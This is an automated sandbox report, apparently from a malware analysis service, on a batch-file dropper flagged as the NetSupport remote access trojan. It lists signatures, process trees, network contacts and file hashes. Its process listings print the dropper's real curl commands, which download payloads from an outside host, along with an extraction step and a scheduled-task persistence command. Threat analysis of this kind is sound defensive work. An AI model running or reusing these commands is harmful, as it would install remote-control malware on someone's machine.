Malware Analysis Report

2025-06-16 05:06

Sample ID 230527-j8er4abf2x
Target 11.bat
SHA256 b2069732f98d91fc2b2814c687115ab927191a0db26dd21a9ac0f7f79a65672b
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b2069732f98d91fc2b2814c687115ab927191a0db26dd21a9ac0f7f79a65672b

Threat Level: Known bad

The file 11.bat was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Creates scheduled task(s)

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-27 08:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-27 08:20

Reported

2023-05-27 08:22

Platform

win7-20230220-en

Max time kernel

28s

Max time network

30s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1108 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\sett.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\7z.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

Network

N/A

Files

C:\ProgramData\sett.bat

MD5 682951b449a6ba6a19e6c5130e3c5ed7
SHA1 e1a6510e4ba54099e13778b0cccdb08ecf0e7bb6
SHA256 e169d1b5f8af9388db4bdcf019cfadbd5daa078427cc5662d43c74dd6b7864da
SHA512 4790b4b636042bea53f22a2cec96f9b3b04920b2941dbc3edad62c611821200042d4cf0979c40c7a96cec1c16d1f76c53f7e6509b04ce1c01e0bf268aa45a127

C:\ProgramData\7z.bat

MD5 7fc6d26bb3e5ff0178bbca973729469f
SHA1 243bf47775c7bbf1498a7b026dffe0b4ed4a3cd3
SHA256 59b8fd877b81ab11211b03d4707db2f1f36b30ac2318a34d61300c57588fb495
SHA512 614331c41bd6ede3a1c91cfcea3a01569f6af4def0f61acb259f0998bfb5d829a36771c393b5169c52e3f1da9d91592a00c1062607b4f23d4a2fcf8f3f978f37

C:\ProgramData\2.bat

MD5 9d012776fb8716fbccf70bb57ae7c7a2
SHA1 bb5dd6998bd3e58259a8da00dec82b910f0cba95
SHA256 cf3fd955993cc009626ce769ec543d1f951911fb891fccb2c33700c37d3488f1
SHA512 79e7c4ba9baac4c1e0cd1cf308f7ce02f98e56d12abf3d5745fa6a5d1bcf55170a83134894b1e427893c1b8be70b0473e1fe45d062af806e9f60cf599533fe94

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-27 08:20

Reported

2023-05-27 08:22

Platform

win10v2004-20230220-en

Max time kernel

135s

Max time network

145s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

Signatures

NetSupport

rat netsupport

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\7zz.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\client32.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A
N/A N/A C:\ProgramData\client32.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\ProgramData\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1644 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1112 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1112 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1644 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1644 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2168 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2168 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1644 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1644 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4392 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4392 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1644 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1644 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4664 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\xcopy.exe
PID 4664 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\xcopy.exe
PID 4664 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\xcopy.exe
PID 4664 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\xcopy.exe
PID 4664 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4664 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4664 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4664 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3348 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\ProgramData\7zz.exe
PID 3348 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\ProgramData\7zz.exe
PID 3348 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\ProgramData\7zz.exe
PID 4664 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4664 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4664 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4664 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4712 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\ProgramData\client32.exe
PID 4712 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\ProgramData\client32.exe
PID 4712 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\ProgramData\client32.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\11.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\sett.bat"

C:\Windows\system32\curl.exe

curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/tempy.7z" -o "C:\ProgramData\tempy.7z"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\7z.bat"

C:\Windows\system32\curl.exe

curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/7z.exe" -o "C:\ProgramData\7zz.exe"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

C:\Windows\system32\curl.exe

curl -k "http://manchhd32ss.fun/412566367c67448b599d1b7666f8ccfc/2.bat" -o "C:\ProgramData\2.bat"

C:\Windows\system32\cmd.exe

cmd.exe /c C:\ProgramData\2.bat"

C:\Windows\system32\xcopy.exe

xcopy /h /y 7zz.exe C:\ProgramData\

C:\Windows\system32\cmd.exe

cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\

C:\Windows\system32\xcopy.exe

xcopy /h /y tempy.7z C:\ProgramData\

C:\Windows\system32\timeout.exe

TIMEOUT /T 2

C:\ProgramData\7zz.exe

C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\

C:\Windows\system32\schtasks.exe

SCHTASKS /create /F /tn "VCC_runner2" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 7 /sd 01/01/2022 /st 00:00

C:\Windows\system32\cmd.exe

cmd /c C:\ProgramData\client32.exe

C:\ProgramData\client32.exe

C:\ProgramData\client32.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 manchhd32ss.fun udp
RU 188.127.224.82:80 manchhd32ss.fun tcp
US 8.8.8.8:53 82.224.127.188.in-addr.arpa udp
RU 188.127.224.82:80 manchhd32ss.fun tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
RU 188.127.224.82:80 manchhd32ss.fun tcp
US 94.158.244.118:1203 tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 118.244.158.94.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 20.189.173.6:443 tcp
US 52.152.110.14:443 tcp
US 209.197.3.8:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 52.152.110.14:443 tcp
NL 84.53.175.11:80 tcp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp

Files

C:\ProgramData\sett.bat

MD5 682951b449a6ba6a19e6c5130e3c5ed7
SHA1 e1a6510e4ba54099e13778b0cccdb08ecf0e7bb6
SHA256 e169d1b5f8af9388db4bdcf019cfadbd5daa078427cc5662d43c74dd6b7864da
SHA512 4790b4b636042bea53f22a2cec96f9b3b04920b2941dbc3edad62c611821200042d4cf0979c40c7a96cec1c16d1f76c53f7e6509b04ce1c01e0bf268aa45a127

C:\ProgramData\7z.bat

MD5 7fc6d26bb3e5ff0178bbca973729469f
SHA1 243bf47775c7bbf1498a7b026dffe0b4ed4a3cd3
SHA256 59b8fd877b81ab11211b03d4707db2f1f36b30ac2318a34d61300c57588fb495
SHA512 614331c41bd6ede3a1c91cfcea3a01569f6af4def0f61acb259f0998bfb5d829a36771c393b5169c52e3f1da9d91592a00c1062607b4f23d4a2fcf8f3f978f37

C:\ProgramData\2.bat

MD5 9d012776fb8716fbccf70bb57ae7c7a2
SHA1 bb5dd6998bd3e58259a8da00dec82b910f0cba95
SHA256 cf3fd955993cc009626ce769ec543d1f951911fb891fccb2c33700c37d3488f1
SHA512 79e7c4ba9baac4c1e0cd1cf308f7ce02f98e56d12abf3d5745fa6a5d1bcf55170a83134894b1e427893c1b8be70b0473e1fe45d062af806e9f60cf599533fe94

C:\ProgramData\2.bat

MD5 20339443a8789c448d23bb7d7d227373
SHA1 0998e456d72d1e0a323761b88f0b6f27eeed3119
SHA256 db9bfac3e8c8667293f5685032eb088e4c2078c308ef59464241e5b89c28143f
SHA512 ffe37c8b2632597c18ab837d833090498ee982c3cd5409f3a6d88fc787e4795bdec3acd2a450fd7060785d8219acccf9d6bc797b092d1de79acc0fc2d1444e7f

C:\ProgramData\7zz.exe

MD5 42badc1d2f03a8b1e4875740d3d49336
SHA1 cee178da1fb05f99af7a3547093122893bd1eb46
SHA256 c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA512 6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

C:\ProgramData\7zz.exe

MD5 42badc1d2f03a8b1e4875740d3d49336
SHA1 cee178da1fb05f99af7a3547093122893bd1eb46
SHA256 c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA512 6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

C:\ProgramData\tempy.7z

MD5 6979bbce289387135ab861f59d2e0483
SHA1 475f466a7f6c37c2d9d64cef1489b3220f58d0ce
SHA256 8973b65aad1ee3f3b2bfa7038f8eaaae97e8b3dfffff6a6e6ef3e5eec04da498
SHA512 a719943df9b73b59c1ed0a9921a0eaa626d3dde9fdb912577d53b2c6852e77adcfff8af2af71ee4e0fd3cda8fab78d89771d43159059febe07e626c2f692c58f

C:\ProgramData\client32.exe

MD5 ba69ff5da9131aa06a6509b05ae1a78f
SHA1 fc1ea269f940b49822885449b3c406a237f4832a
SHA256 d4d475aee58cab94a918c92c65a7d462f4dd5b9ec15b194162483be711f5bfbb
SHA512 e4dd4388f40e027b5d909bb35d77197f0814148605211ee88de77cb4420438c8a4e58bba5f4ed0828d616d0ebad4b905713595f38f7a236244c56cbc0f647a19

C:\ProgramData\client32.exe

MD5 ba69ff5da9131aa06a6509b05ae1a78f
SHA1 fc1ea269f940b49822885449b3c406a237f4832a
SHA256 d4d475aee58cab94a918c92c65a7d462f4dd5b9ec15b194162483be711f5bfbb
SHA512 e4dd4388f40e027b5d909bb35d77197f0814148605211ee88de77cb4420438c8a4e58bba5f4ed0828d616d0ebad4b905713595f38f7a236244c56cbc0f647a19

C:\ProgramData\PCICL32.dll

MD5 d3d39180e85700f72aaae25e40c125ff
SHA1 f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA256 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

C:\ProgramData\PCICL32.DLL

MD5 d3d39180e85700f72aaae25e40c125ff
SHA1 f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA256 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

C:\ProgramData\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\ProgramData\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\ProgramData\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\ProgramData\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\ProgramData\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\ProgramData\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\ProgramData\NSM.LIC

MD5 1b41e64c60ca9dfadeb063cd822ab089
SHA1 abfcd51bb120a7eae5bbd9a99624e4abe0c9139d
SHA256 f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d
SHA512 c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

C:\ProgramData\client32.ini

MD5 9fd51ba7e1b8b8c4586354338df32acc
SHA1 30f194d6f87be214031410adeaf5f9df4f7945e2
SHA256 7d1302fc5aeb3aa1233d44cea8263ee577041c92d7aab5cad69dce94574ef49a
SHA512 04d9db9653d98e578631a743dd7693ee3094d1c25e83e0bf66ab42e3b00e0abeeebf03e982d4392fb5ed49b9698062d7ba2350f209c1af721c064fda17cb9760

C:\ProgramData\TCCTL32.DLL

MD5 eab603d12705752e3d268d86dff74ed4
SHA1 01873977c871d3346d795cf7e3888685de9f0b16
SHA256 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea
SHA512 77de0d9c93ccba967db70b280a85a770b3d8bea3b707b1abb037b2826b48898fec87924e1a6cce218c43478e5209e9eb9781051b4c3b450bea3cd27dbd32c7f3

C:\ProgramData\TCCTL32.DLL

MD5 eab603d12705752e3d268d86dff74ed4
SHA1 01873977c871d3346d795cf7e3888685de9f0b16
SHA256 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea
SHA512 77de0d9c93ccba967db70b280a85a770b3d8bea3b707b1abb037b2826b48898fec87924e1a6cce218c43478e5209e9eb9781051b4c3b450bea3cd27dbd32c7f3

C:\ProgramData\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

C:\ProgramData\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a